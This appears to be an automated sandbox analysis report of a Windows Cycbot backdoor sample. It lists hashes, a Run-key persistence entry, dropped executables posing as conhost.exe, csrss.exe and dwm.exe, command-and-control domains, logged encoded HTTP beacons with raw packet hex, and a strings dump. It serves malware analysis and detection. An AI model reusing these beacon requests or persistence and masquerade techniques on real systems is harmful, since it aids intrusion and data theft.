Analysis Date: 2013-11-02 23:24:41
MD5: 31231fcc4b004bb5b75d0978a298c940
SHA1: ab93a05637691ce10a0505d3bdeeaf9500dd9831

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 72ab98e7c4c7a658c2ab79edc248efba sha1: bc2deea608cd26366ba6e092ab141969b07e858e size: 89600
Section .tls   md5: 4bc19ac04ba9ddafafeecdb09e1c02bf sha1: 28b2abeedefe8ac220f2503fa3778a362680a26c size: 1024
Section .data  md5: 538dcf7f998d4f7d2054618942d94018 sha1: 93c6240f95afa286905bc3341c84c3194b204d7e size: 77312
Section .reloc md5: e40120f64670a7823e0c9463472e98e0 sha1: 72b62e1af4bdb86c8c1ccf10d374d76dbf9e753f size: 1024
Timestamp: 2005-11-28 01:19:55
PEhash: 3fdd47400d3849888455f032cc504f7d02a880b4
AV (avg): BackDoor.Generic_r.TF
AV (avira): BDS/Cycbot.BP

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS: resetsystems-1.com
Winsock DNS: 127.0.0.1
Winsock DNS: onlinedatingsecretfriends.com
Winsock DNS: happyratatuy.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: onlinedatingsecretfriends.com
Type: A
8.5.1.38
DNS: zonedg.com
Type: A
141.101.115.20
DNS: zonedg.com
Type: A
141.101.114.20
DNS: zonedg.com
Type: A
190.93.246.20
DNS: zonedg.com
Type: A
190.93.245.20
DNS: zonedg.com
Type: A
190.93.244.20
DNS: zonedg.com
Type: A
141.101.115.20
DNS: zonedg.com
Type: A
141.101.114.20
DNS: zonedg.com
Type: A
190.93.246.20
DNS: zonedg.com
Type: A
190.93.245.20
DNS: zonedg.com
Type: A
190.93.244.20
DNS: happyratatuy.com
Type: A
DNS: resetsystems-1.com
Type: A
HTTP GET: http://onlinedatingsecretfriends.com/images/im133.jpg?v71=42&tq=gHZutDyMv5rJeiG1J8K%2B1MWCJbP4lltXIA%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 8.5.1.38:80
Flows TCP: 192.168.1.1:1033 ➝ 141.101.115.20:80
Flows TCP: 192.168.1.1:1034 ➝ 141.101.115.20:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7637 313d3432 2674713d   3.jpg?v71=42&tq=
0x00000020 (00032)   67485a75 7444794d 7635724a 65694731   gHZutDyMv5rJeiG1
0x00000030 (00048)   4a384b25 3242314d 57434a62 50346c6c   J8K%2B1MWCJbP4ll
0x00000040 (00064)   74584941 25334425 33442048 5454502f   tXIA%3D%3D HTTP/
0x00000050 (00080)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206f6e    close..Host: on
0x00000070 (00112)   6c696e65 64617469 6e677365 63726574   linedatingsecret
0x00000080 (00128)   66726965 6e64732e 636f6d0d 0a416363   friends.com..Acc
0x00000090 (00144)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000a0 (00160)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x000000b0 (00176)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a                  close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
080904b0
1484
3.0.0.1
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
'\*<*>
\0F rB
0h8T2h	'
0h#*bh
0hiKQhbh
{1'?08-3
?16:TA
1AWg G
1_Bh2h
[1Qph^M^
@1Ro`@^
1(t4|	
:2"":f
2h.'`hK
2h^PhRh
2L4okL
37/|Rh0ha
3Iv@h|
3p"fot!
)3urhS1
483Wmt
4GLO70
5Ph?cx'
#6EEI,
6>"hD_
76q<]N
7&#D+Xo1l
7j8uZC ho
7OZ"\;
(7^_^y"RF(e
;|$8*{
8@h2h!
#8	n^`
9"h#LN
9.@hphj
9RhaEa2h
9rhf h
9\TVh-
9zUgq?Ru
_a%+_|
A0VCo"
^+aAn^K
A&.;&g
A	gLtD
a^HW`h
A(iypnC(
A:oph]A/
awf~BU
b\cY!7!
	}\Bh=
Bh0hbh
Bh?,1*
bh?Ad h
=bh^)C
.bhd3s|
bhe|t9
bhhvBh"hph
}Bh`hVz
bh}h;YJ4
bhL=Rh
bhvx2h
bq_6fv
<byT"g
:C2h+@h
c;D]).
ce"hbhn
cHY~e=9
!'ClnM
CoGetMalloc
CoTaskMemFree
CRh! h
C|rhu4
-CT8T3bh3
CWfcL!
CWV7t<k
d3?x_o
;#;D5R
@.data
Dbh	4w
d@hL'_
D:nO{1
Do5h[h
DqQJ%x]
)D'r,x
!/<{&e
%"&,E(
[e$4qKe
E`h0h#Y
&e?@JiF
EnumResourceNamesA
EoC2hq
ePhf2h
eq7W]S
esrh}|w
/eXUph
 _"ey&?
ey";c/
fAyZBh
fbh;fy
FFS`h1
f\FYus hA
FindFirstFileA
FindFirstFileW
FindNextFileA
fM'g"h
FormatMessageW
fqZ"hum
F\s]Ph.&=
ftYgi$
f	U#oU
f!u)=S
f^X%'t
GetCalendarInfoA
GetCommandLineW
GetCurrentDirectoryW
GetModuleHandleW
GetProcessHeap
GlobalFree
&gS9r-r8
Gtrh7	
+GU,rh
G'?::v
gv%F}v	
G-x=w;
h;0h}rh&
h'0hrh
h0h=Z[
H[0S@Bx
h~&1je>
h4Y# hN
h5z^O.I
h6E&Abh
]`h&6V}
h_^8f[:4.
@hALrh
hbh0h{k
hbha1~
hbhfuC
@hbhm.
@hBho_W
h_Bht&"h
h[bh,U$
@h	cBh
h,crhaS
H;CrhL
HeapAlloc
HeapFree
hECW0hrh
heeOH%Fa
h[E@hK
hE$Ph?4
hF2hG@h
hfBhN?
h'fn(j
hFs30h
hFSRhl>
-+-`h|_g
<hGDI3
hgGph:`hM
h@h_</
h+'/"h
h@h0hRh,
"h@h.6
@h`h8u}
h"hE@h
h| h`haDES
hHk<k0h
`h"hVZH
h"hw)oC
hiG5I$
}`hiv>
"hIxt'
hJ`h7 h
 h^\k.
hkBh',
hK_q9Un
hKRh3bh
hlNL`h
hLsguX|
hLSM4z
h<+}]n
hNH-?yj/
`hnJI'
`h^o2h
h[ph?`h
hPh$k$U
hphVUm
hQse2h
H[$rh6
h>Rhbh
h:&'!T
`htS"h
| h^{U
 hu2hZ
hU4cRh
hU'>ERh
hUvZPh
hVUV'U
hWXmCq
hX0h+UY
"hx5W!aW
h)X7phL
;hxNk"6
h;XvU h5T)mE
^)`hy'
hyarh_
%H:{Yt0C)
hy~.UL
h<Z5`h
hz#_t$h-S
hzybh3
ibhYQ/
iEM|]k
)%	#IjFP
Ix(BhY
|\.IYy
J1_[Jhs
J|}+2h
:JF5Bhd]
<{JfV7
j`h&Ph8
J?qN/d]g
jQQ{L7
`,j(Z>
K9DKX 
,K.{bh
KERNEL32.dll
kF3Z~}
k#fLt%+V
kh2.dl
 ?KH+e
<kZd]1
l0hRh*=6RhRh[!f/
L1+bhc
L3TRu1G
LA6()z
_lclose
l&	$cx
_l@kM{
_llseek
LoadResource
LocalFree
LockResource
_lread
lRh.EA
lW_4q8
lWOrh#E>
_lwrite
m%<0~G
M2hQcV=
m2hy7;e
m`]Gbp
Ml[c{+
mmp^/F@
M(	nHd
MultiByteToWideChar
N2h0hN
N2hrhE\:
n/<aKX
NBhyBhd
	nbt'=
>N\d0h
%{]n@h;
+Njdj&
*ntVPY
$*>nzAo
NzrhEo|
O4M=Uq
Oe_LO)J
O@hPhHL
oILrh)
oJ<{<ur
ole32.dll
ooBK(v
O$p!c7
	oV=ypj	o
*o^WoB
oZ+4u}t7
%@O;Z5
P*aJlO
;PE+RyC
Ph6iBh
Ph&D8=
PhF}s-N
ph?;gH
ph@h$5
Ph+INd$n
PhNL,ph
phrh(5
phTG|+
pkYP3+y?
PPPPPP
ProgIDFromCLSID
P{Zvag
^Q0? "
Q2h\IW
,|qgRh
qM_$);q
Q.Q@hPh&
^QQJ&3!ukE
"+Q!|y
qZ~&Saj2
RaiseException
\RBT36
r#D*QN
R%`:EK
.reloc
'rg|a9
Rh0h@h
Rh5o,%
rh=#:7v
Rha7ZT`h
rh.dabhA
rh{DsEa8
rh;G@h
/Rh"h{\
\RhoU7sC
RhPhod
[RhRhDX,
Rh]}WC
RhxbhN
Rhy;v`h
\^\~RK5
RpcBindingFromStringBindingA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
rtpyePJ_
R'wy	g
rX_jh9
~r{zR"
+$}s7<l
SA8-.K
SalI@h&
SetLastError
*S% h-
S`h2hD
shg^6`h
SizeofResource
sphPhS
sqz	=L8
StringFromCLSID
T[#\Ct
TePhAI
tG2V_J&S
!This program cannot be run in DOS mode.
t`hZBh
TOWx.U
TVZ"hBh
%TX$Sw
t&YpW<
!U5*HG
/u.A!:}+
*@U.a*
U	$aye
UBi=^0j
UC'6a_H
u`h]s0hl}Rh
&uq`Qn
uwrh"h,
&u||X8=
*UXD@-
vA])ZK
vBh\7%
{=v_[L
VNg=$d
;W0h h
W.5BhT1
	w'8aJ
w`'9t$
~w]/br
<"@WOnrHi/
WRh&LH
(WRho^
))WSRh
#w=Um52o
<Wv7Y\
X0:mk_k
X'6PPq
x$Az/y
xc2hw+rh
|XeFWYl
Yc!H&V
!YDA',
y<%Jv&
!(yo@h
YU,4a5T
@yxk?v
zin?0{
Zmcv.A"
[ZO8~%
@*z!]z
zzV?uf